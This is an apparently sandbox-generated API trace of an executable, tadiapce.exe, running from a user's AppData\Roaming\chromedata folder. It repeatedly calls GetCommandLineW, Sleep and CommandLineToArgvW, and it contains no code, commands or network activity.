	[0090.567] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.567] Sleep (dwMilliseconds=0x1) 
	[0090.639] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221f60*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.639] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.639] Sleep (dwMilliseconds=0x1) 
	[0090.678] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x221ff0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.678] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.678] Sleep (dwMilliseconds=0x1) 
	[0090.723] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222080*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.723] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.723] Sleep (dwMilliseconds=0x1) 
	[0090.742] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222110*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.742] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.742] Sleep (dwMilliseconds=0x1) 
	[0090.847] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2221a0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.847] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.847] Sleep (dwMilliseconds=0x1) 
	[0090.903] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222230*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.903] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.903] Sleep (dwMilliseconds=0x1) 
	[0090.964] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2222c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.964] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.964] Sleep (dwMilliseconds=0x1) 
	[0090.988] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222350*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0090.988] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0090.988] Sleep (dwMilliseconds=0x1) 
	[0091.000] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2223e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.000] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.000] Sleep (dwMilliseconds=0x1) 
	[0091.011] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222470*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.011] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.011] Sleep (dwMilliseconds=0x1) 
	[0091.026] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222500*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.026] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.027] Sleep (dwMilliseconds=0x1) 
	[0091.042] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222590*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.042] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.042] Sleep (dwMilliseconds=0x1) 
	[0091.058] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222620*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.058] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.058] Sleep (dwMilliseconds=0x1) 
	[0091.074] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2226b0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.074] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.074] Sleep (dwMilliseconds=0x1) 
	[0091.089] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222740*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.089] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.089] Sleep (dwMilliseconds=0x1) 
	[0091.105] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2227d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.105] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.105] Sleep (dwMilliseconds=0x1) 
	[0091.120] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222860*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.121] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.121] Sleep (dwMilliseconds=0x1) 
	[0091.136] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2228f0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.136] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.136] Sleep (dwMilliseconds=0x1) 
	[0091.152] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222980*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.152] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.152] Sleep (dwMilliseconds=0x1) 
	[0091.167] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222a10*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.167] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.167] Sleep (dwMilliseconds=0x1) 
	[0091.183] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222aa0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.183] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.183] Sleep (dwMilliseconds=0x1) 
	[0091.198] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222b30*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.198] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.199] Sleep (dwMilliseconds=0x1) 
	[0091.214] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222bc0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.214] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.214] Sleep (dwMilliseconds=0x1) 
	[0091.229] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222c50*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.229] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.230] Sleep (dwMilliseconds=0x1) 
	[0091.245] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222ce0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.245] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.245] Sleep (dwMilliseconds=0x1) 
	[0091.261] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222d70*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.261] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.261] Sleep (dwMilliseconds=0x1) 
	[0091.276] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222e00*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.276] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.276] Sleep (dwMilliseconds=0x1) 
	[0091.292] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222e90*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.292] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.292] Sleep (dwMilliseconds=0x1) 
	[0091.308] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222f20*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.308] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.308] Sleep (dwMilliseconds=0x1) 
	[0091.323] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x222fb0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.323] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.323] Sleep (dwMilliseconds=0x1) 
	[0091.339] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223040*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.339] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.339] Sleep (dwMilliseconds=0x1) 
	[0091.354] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2230d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.354] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.354] Sleep (dwMilliseconds=0x1) 
	[0091.371] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223160*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.371] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.371] Sleep (dwMilliseconds=0x1) 
	[0091.385] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2231f0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.385] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.385] Sleep (dwMilliseconds=0x1) 
	[0091.401] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223280*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.401] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.401] Sleep (dwMilliseconds=0x1) 
	[0091.417] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223310*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.417] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.417] Sleep (dwMilliseconds=0x1) 
	[0091.432] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2233a0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.432] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.432] Sleep (dwMilliseconds=0x1) 
	[0091.448] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223430*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.448] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.448] Sleep (dwMilliseconds=0x1) 
	[0091.463] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2234c0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.464] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.464] Sleep (dwMilliseconds=0x1) 
	[0091.479] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223550*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.479] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.479] Sleep (dwMilliseconds=0x1) 
	[0091.495] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2235e0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.495] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.495] Sleep (dwMilliseconds=0x1) 
	[0091.510] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223670*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.510] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.510] Sleep (dwMilliseconds=0x1) 
	[0091.526] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223700*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.526] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.526] Sleep (dwMilliseconds=0x1) 
	[0091.542] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223790*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.542] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.542] Sleep (dwMilliseconds=0x1) 
	[0091.557] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223820*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.557] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.557] Sleep (dwMilliseconds=0x1) 
	[0091.581] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2238b0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.581] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.581] Sleep (dwMilliseconds=0x1) 
	[0091.588] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223940*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.588] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.588] Sleep (dwMilliseconds=0x1) 
	[0091.604] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2239d0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.604] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.604] Sleep (dwMilliseconds=0x1) 
	[0091.619] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223a60*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.620] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.620] Sleep (dwMilliseconds=0x1) 
	[0091.635] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223af0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.635] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.635] Sleep (dwMilliseconds=0x1) 
	[0091.651] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223b80*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.651] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.651] Sleep (dwMilliseconds=0x1) 
	[0091.666] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223c10*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.666] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.666] Sleep (dwMilliseconds=0x1) 
	[0091.682] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223ca0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.682] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.682] Sleep (dwMilliseconds=0x1) 
	[0091.699] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223d30*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.699] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.699] Sleep (dwMilliseconds=0x1) 
	[0091.713] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223dc0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.713] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.713] Sleep (dwMilliseconds=0x1) 
	[0091.739] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x223e50*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.739] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.739] Sleep (dwMilliseconds=0x1) 
	[0091.744] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x2263a0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.744] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.744] Sleep (dwMilliseconds=0x1) 
	[0091.768] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x226430*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0091.768] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0091.768] Sleep (dwMilliseconds=0x1) 
